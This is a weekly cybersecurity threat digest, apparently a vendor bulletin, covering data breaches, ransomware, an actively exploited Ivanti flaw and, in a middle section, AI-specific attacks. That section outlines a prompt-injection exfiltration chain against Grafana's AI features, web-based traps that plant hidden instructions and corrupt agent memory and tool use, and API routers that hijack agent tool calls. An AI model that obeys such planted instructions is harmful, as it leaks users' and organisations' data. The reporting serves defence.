Weekly Threat Intelligence Digest: April 13th Edition
Major Attacks and Data Breaches
The week of April 13th witnessed several significant cyber incidents, ranging from data exposures at law enforcement agencies to ransomware attacks on healthcare providers and political parties. Below is a detailed breakdown of the most impactful events.
Los Angeles Police Department Data Exposure
The Los Angeles Police Department (LAPD) disclosed a major data breach involving a digital storage system shared with the L.A. City Attorney’s Office. The incident exposed approximately 7.7 terabytes of data, encompassing over 337,000 files. Among the compromised materials were personnel records, internal affairs documents, and unredacted personal information, raising serious concerns about privacy and operational security.
ChipSoft Ransomware Cripples Dutch Hospitals
ChipSoft, a Netherlands-based healthcare software vendor, suffered a ransomware attack that forced the company to disable patient and provider services on its widely used HiX platform. This disruption caused multiple hospitals across the country to disconnect from the system, significantly impacting medical operations. The company warned that the threat actor may have gained unauthorized access to sensitive patient data, further escalating the incident’s severity.
Qilin Ransomware Targets German Political Party
The ransomware group Qilin claimed responsibility for a cyberattack against the German political party Die Linke. The attack, which occurred in late March, compelled the party to shut down its entire IT infrastructure. While officials stated that membership databases were not compromised, Qilin has threatened to leak stolen sensitive employee and party information. Check Point Endpoint and Threat Emulation solutions are protecting against this specific ransomware variant (Ransomware.Wins.Qilin).
Bitcoin Depot Crypto Heist
Bitcoin Depot, a major US cryptocurrency ATM operator with over 25,000 kiosks and checkout locations, disclosed a cyberattack that enabled attackers to steal credentials for digital asset settlement accounts. The perpetrators transferred more than 50 Bitcoin (worth approximately $3.6 million) from company-controlled wallets before access was blocked. The incident underscores the persistent risks facing cryptocurrency businesses.
Emerging AI Threats
This week’s research highlights novel attack vectors targeting artificial intelligence systems, including prompt injection and supply chain vulnerabilities. These findings underscore the need for robust security measures in AI deployments.
GrafanaGhost: Silent Enterprise Data Exfiltration
Researchers uncovered an attack technique named GrafanaGhost, which targets Grafana’s AI components. By chaining indirect prompt injection with an image URL validation bypass, attackers can silently exfiltrate enterprise data such as financial records, infrastructure details, and customer information—all running in the background without user awareness. Grafana has since addressed the weakness, but the discovery highlights the importance of securing AI interfaces.
AI Agent Traps: A Framework for Malicious Manipulation
A new framework called AI Agent Traps outlines six web-based attack classes that can manipulate autonomous AI agents. These methods include injecting hidden instructions, poisoning reasoning processes, corrupting memory, and steering tool usage. The research shows how ordinary web pages can turn agent workflows into attack surfaces, enabling adversaries to hijack AI-driven operations.
AI Supply Chain Risks via Third-Party API Routers
Researchers identified growing risks in the AI supply chain, particularly from third-party API routers. These routers can hijack agent tool calls to alter commands and steal credentials. In controlled tests, several routers injected malicious code, abused intercepted cloud keys, and even triggered wallet theft in a researcher’s environment. This finding emphasizes the need for rigorous vetting of third-party components in AI pipelines.
Critical Vulnerabilities and Patches
Security authorities issued urgent warnings about an actively exploited vulnerability in Ivanti’s Endpoint Manager Mobile, along with recommendations for immediate remediation.
Ivanti CVE-2026-1340: Active Exploitation in the Wild
US Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of CVE-2026-1340, a critical code injection vulnerability in Ivanti Endpoint Manager Mobile. This flaw allows unauthenticated remote code execution, potentially leading to full compromise of affected servers. With a CVSS score of 9.8, the vulnerability impacts multiple releases from versions 12.5 through 12.7. Organizations are urged to apply patches immediately. Check Point IPS provides protection against this threat.
For detailed technical information and updates, refer to the original Threat Intelligence Bulletin.